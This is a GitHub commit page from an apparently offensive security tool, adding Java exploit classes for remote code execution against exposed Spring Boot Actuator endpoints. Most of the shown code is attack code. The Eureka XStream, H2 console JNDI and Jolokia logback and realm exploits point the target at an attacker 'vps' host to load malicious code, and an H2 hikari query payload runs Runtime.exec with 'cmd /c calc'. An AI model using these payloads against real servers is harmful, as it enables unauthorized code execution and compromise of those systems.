Skip to content
This repository was archived by the owner on Jul 25, 2024. It is now read-only.

Commit c971699

Browse files
SummerSecSummerSec
committed
多种RCE
1 parent fb86cc3 commit c971699

21 files changed

Lines changed: 1248 additions & 28 deletions

src/main/java/com/drops/exp/EurekaXstreamRCEExp.java

Lines changed: 66 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,66 @@
1+
package com.drops.exp;
2+
3+
import com.drops.exp.util.EnvPost;
4+
import com.drops.exp.util.RefreshPost;
5+
import com.drops.utils.URLUtil;
6+
7+
/**
8+
* @ClassName: EurekaXstreamRCE
9+
* @Description: TODO
10+
* @Author: Summer
11+
* @Date: 2021/7/29 11:09
12+
* @Version: v1.0.0
13+
* @Description:
14+
**/
15+
public class EurekaXstreamRCEExp {
16+
static String bobyV1 = "eureka.client.serviceUrl.defaultZone=";
17+
static String bobyV2 = "{\"name\":\"eureka.client.serviceUrl.defaultZone\",\"value\":\"";
18+
19+
/**
20+
* @Description:
21+
* @param target http://127.0.0.1:9092/
22+
* @param vps http://127.0.0.1:9092/example
23+
*
24+
* @return:
25+
*/
26+
public static boolean setRCEV1(String target, String vps, String port){
27+
String boby = bobyV1 + vps + port + "/example";
28+
System.out.println(boby);
29+
if (EnvPost.isPostEnv(target)){
30+
if (RefreshPost.isRefreshPost(target)){
31+
if (EnvPost.PostEnv(target,boby)){
32+
if (RefreshPost.isRefreshPost(target)){
33+
System.out.println("EurekaXstreamRCEExp利用成功");
34+
}
35+
return false;
36+
}
37+
}
38+
}
39+
return false;
40+
}
41+
42+
public static boolean setRCEV2(String target, String vps, String port){
43+
String boby = bobyV2 + vps + port + "/example\"}";
44+
System.out.println(boby);
45+
if (EnvPost.isPostEnvV2(target)){
46+
if (RefreshPost.isRefreshPostV2(target)){
47+
if (EnvPost.PostEnvV2(target,boby)){
48+
if (RefreshPost.isRefreshPostV2(target)){
49+
System.out.println("EurekaXstreamRCEExp利用成功");
50+
}
51+
return false;
52+
}
53+
}
54+
}
55+
return false;
56+
}
57+
58+
public static void main(String[] args) {
59+
String target = "127.0.0.1:9093";
60+
String vps = "127.0.0.1:6789";
61+
String port = "6789";
62+
EurekaXstreamRCEExp.setRCEV1(URLUtil.normalizeURL(target),
63+
vps, port);
64+
65+
}
66+
}

src/main/java/com/drops/exp/H2DatabaseConsoleJNDIRCEEXP.java

Lines changed: 39 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,39 @@
1+
package com.drops.exp;
2+
3+
import com.drops.exp.util.H2DatabaseUtil;
4+
import com.drops.utils.HTTPUtils;
5+
6+
/**
7+
* @ClassName: H2DatabaseConsoleJNDIRCEEXP
8+
* @Description: TODO
9+
* @Author: Summer
10+
* @Date: 2021/7/30 9:56
11+
* @Version: v1.0.0
12+
* @Description:
13+
**/
14+
public class H2DatabaseConsoleJNDIRCEEXP {
15+
16+
17+
public static boolean hasH2DatabaseConsoleJNDIRCE(String target,String vps, String port,boolean version) {
18+
String boby = "language=en&setting=Generic+H2+(Embedded)&name=Generic+H2+(Embedded)&driver=javax.naming.InitialContext&url=ldap:/" + vps + ":" + port +"/#JNDIObject&user=&password=";
19+
20+
if (version){
21+
if (H2DatabaseUtil.hasH2Database(target,version)){
22+
String path = H2DatabaseUtil.getJsessionid(target);
23+
if(HTTPUtils.postRequestV1(target,path,boby).getStatus() == 200){
24+
return true;
25+
}
26+
}
27+
}else {
28+
if (H2DatabaseUtil.hasH2Database(target,version)){
29+
String path = H2DatabaseUtil.getJsessionid(target);
30+
if(HTTPUtils.postRequestV2(target,path,boby).getStatus() == 200){
31+
return true;
32+
}
33+
}
34+
}
35+
36+
37+
return false;
38+
}
39+
}

src/main/java/com/drops/exp/JolokiaLogbackRCEEXP.java

Lines changed: 43 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,43 @@
1+
package com.drops.exp;
2+
3+
import cn.hutool.http.HttpResponse;
4+
import com.drops.exp.util.JolokiaUtil;
5+
import com.drops.utils.HTTPUtils;
6+
import com.drops.utils.ResponseUtil;
7+
8+
/**
9+
* @ClassName: JolokiaLogback
10+
* @Description: TODO
11+
* @Author: Summer
12+
* @Date: 2021/7/29 14:50
13+
* @Version: v1.0.0
14+
* @Description:
15+
**/
16+
public class JolokiaLogbackRCEEXP {
17+
18+
public static boolean hasJolokiaLogbackRCE(String target, String vps, String port, boolean version) {
19+
20+
21+
String path = "/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/" + vps
22+
+ "!/example.xml";
23+
24+
if (version){
25+
if (JolokiaUtil.hasMbeans(target)){
26+
int result = HTTPUtils.getRequest(target + path).getStatus();
27+
if (result == 200){
28+
return true;
29+
}
30+
}
31+
}else {
32+
if (JolokiaUtil.hasMbeansV2(target)){
33+
int result = HTTPUtils.getRequest(target + "/actuator" + path).getStatus();
34+
if (result == 200){
35+
return true;
36+
}
37+
}
38+
}
39+
40+
return false;
41+
42+
}
43+
}

src/main/java/com/drops/exp/JolokiaRealmRCEEXP.java

Lines changed: 87 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,87 @@
1+
package com.drops.exp;
2+
3+
import com.drops.exp.util.JolokiaUtil;
4+
import com.drops.utils.HTTPUtils;
5+
6+
/**
7+
* @ClassName: JolokiaRealmRCEEXP
8+
* @Description: TODO
9+
* @Author: Summer
10+
* @Date: 2021/7/29 15:20
11+
* @Version: v1.0.0
12+
* @Description:
13+
**/
14+
public class JolokiaRealmRCEEXP {
15+
16+
public static boolean hasJolokiaRealmRCE(String target, String vps, String port, boolean version) {
17+
18+
19+
20+
String create_realm = " {\n" +
21+
" \"mbean\": \"Tomcat:type=MBeanFactory\",\n" +
22+
" \"type\": \"EXEC\",\n" +
23+
" \"operation\": \"createJNDIRealm\",\n" +
24+
" \"arguments\": [\"Tomcat:type=Engine\"]\n" +
25+
"}";
26+
27+
String wirte_factory = " {\n" +
28+
" \"mbean\": \"Tomcat:realmPath=/realm0,type=Realm\",\n" +
29+
" \"type\": \"WRITE\",\n" +
30+
" \"attribute\": \"contextFactory\",\n" +
31+
" \"value\": \"com.sun.jndi.rmi.registry.RegistryContextFactory\"\n" +
32+
"}";
33+
// 设置 http
34+
String write_url = "{\n" +
35+
" \"mbean\": \"Tomcat:realmPath=/realm0,type=Realm\",\n" +
36+
" \"type\": \"WRITE\",\n" +
37+
" \"attribute\": \"connectionURL\",\n" +
38+
" \"value\": \"ldap://" + vps + ":1389/#JNDIObject\"\n" +
39+
"}";
40+
41+
String stop = "{\n" +
42+
" \"mbean\": \"Tomcat:realmPath=/realm0,type=Realm\",\n" +
43+
" \"type\": \"EXEC\",\n" +
44+
" \"operation\": \"stop\",\n" +
45+
" \"arguments\": []\n" +
46+
"}";
47+
48+
String start = "{\n" +
49+
" \"mbean\": \"Tomcat:realmPath=/realm0,type=Realm\",\n" +
50+
" \"type\": \"EXEC\",\n" +
51+
" \"operation\": \"start\",\n" +
52+
" \"arguments\": []\n" +
53+
"}";
54+
55+
String[] poc = new String[]{create_realm, wirte_factory, write_url, stop, start};
56+
57+
58+
if (version){
59+
if (JolokiaUtil.hasMbeansV3(target)){
60+
for (String p: poc){
61+
if (
62+
HTTPUtils.postRequestV1(target, "/jolokia").getStatus() != 200
63+
){
64+
return false;
65+
}
66+
}
67+
return true;
68+
}
69+
}else {
70+
if (JolokiaUtil.hasMbeansV4(target)){
71+
for (String p: poc){
72+
if (
73+
HTTPUtils.postRequestV1(target, "/actuator/jolokia").getStatus() != 200
74+
){
75+
return false;
76+
}
77+
}
78+
return true;
79+
}
80+
}
81+
82+
83+
84+
return false;
85+
}
86+
87+
}

src/main/java/com/drops/exp/RestartH2DatabaseQueryRCEEXP.java

Lines changed: 44 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,44 @@
1+
package com.drops.exp;
2+
3+
import com.drops.exp.util.EnvPost;
4+
import com.drops.exp.util.H2DatabaseUtil;
5+
import com.drops.exp.util.RefreshPost;
6+
7+
/**
8+
* @ClassName: RestartH2DatabaseQueryRCEEXP
9+
* @Description: TODO
10+
* @Author: Summer
11+
* @Date: 2021/7/30 9:47
12+
* @Version: v1.0.0
13+
* @Description:
14+
**/
15+
public class RestartH2DatabaseQueryRCEEXP {
16+
17+
public static boolean hasRestartH2DatabaseQueryRCE(String target,boolean version) {
18+
String property1 = "spring.datasource.hikari.connection-test-query=CREATE ALIAS T5 AS CONCAT('void ex(String m1,String m2,String m3)throws Exception{Runti','me.getRun','time().exe','c(new String[]{m1,m2,m3});}');CALL T5('cmd','/c','calc');";
19+
String property2 = "{\"name\":\"spring.datasource.hikari.connection-test-query\",\"value\":\"CREATE ALIAS T5 AS CONCAT('void ex(String m1,String m2,String m3)throws Exception{Runti','me.getRun','time().exe','c(new String[]{m1,m2,m3});}');CALL T5('cmd','/c','calc');\"}";
20+
21+
if (version) {
22+
if (EnvPost.isPostEnv(target)) {
23+
if (EnvPost.PostEnv(target, property1)) {
24+
if (RefreshPost.isRefreshPost(target)) {
25+
return true;
26+
}
27+
}
28+
}
29+
} else {
30+
if (H2DatabaseUtil.hasH2Database(target,version)){
31+
if (EnvPost.isPostEnvV2(target)) {
32+
if (EnvPost.PostEnvV2(target, property2)) {
33+
if (RefreshPost.isRefreshPostV2(target)) {
34+
return true;
35+
}
36+
}
37+
}
38+
}
39+
}
40+
41+
return false;
42+
}
43+
44+
}

src/main/java/com/drops/exp/util/EnvPost.java

Lines changed: 81 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,81 @@
1+
package com.drops.exp.util;
2+
3+
import cn.hutool.http.HttpResponse;
4+
import com.drops.utils.HTTPUtils;
5+
import com.drops.utils.ResponseUtil;
6+
import com.drops.utils.URLUtil;
7+
8+
/**
9+
* @ClassName: EnvPost
10+
* @Description: TODO
11+
* @Author: Summer
12+
* @Date: 2021/7/29 11:10
13+
* @Version: v1.0.0
14+
* @Description:
15+
**/
16+
public class EnvPost {
17+
18+
/**
19+
* @Description: env
20+
* @param target
21+
* @param boby
22+
*
23+
* @return:
24+
*/
25+
public static Boolean PostEnv(String target, String boby){
26+
if (isPostEnv(target)) {
27+
HttpResponse result = HTTPUtils.postRequestV1(target, "env", boby);
28+
if (ResponseUtil.getStats(result) == 200) {
29+
if (ResponseUtil.getBoby(result).isEmpty()) {
30+
System.out.println("返回包状态码 200,但返回包内容为null!请手工验证是否成功!");
31+
return true;
32+
}
33+
return true;
34+
} else {
35+
System.out.println("返回包状态码:" + ResponseUtil.getStats(result));
36+
System.out.println(boby + " 属性设置失败!");
37+
}
38+
}
39+
return false;
40+
}
41+
42+
public static Boolean PostEnvV2(String target, String boby){
43+
if (isPostEnv(target)) {
44+
HttpResponse result = HTTPUtils.postRequestV2(target, "actuator/env", boby);
45+
if (ResponseUtil.getStats(result) == 200) {
46+
if (ResponseUtil.getBoby(result).isEmpty()) {
47+
System.out.println("返回包状态码 200,但返回包内容为null!请手工验证是否成功!");
48+
return true;
49+
}
50+
return true;
51+
} else {
52+
System.out.println("返回包状态码:" + ResponseUtil.getStats(result));
53+
System.out.println(boby + " 属性设置失败!");
54+
}
55+
}
56+
return false;
57+
}
58+
59+
/**
60+
* @Description: 验证env端口是否存活,能否接受post请求
61+
* @param target
62+
*
63+
* @return:
64+
*/
65+
public static boolean isPostEnv(String target){
66+
HttpResponse result = HTTPUtils.postRequestV1(target,"env");
67+
if (ResponseUtil.getStats(result) == 200){
68+
return true;
69+
}
70+
return false;
71+
}
72+
73+
public static boolean isPostEnvV2(String target){
74+
HttpResponse result = HTTPUtils.postRequestV2(target,"actuator/env");
75+
if (ResponseUtil.getStats(result) == 200){
76+
return true;
77+
}
78+
return false;
79+
}
80+
81+
}

0 commit comments

Comments
 (0)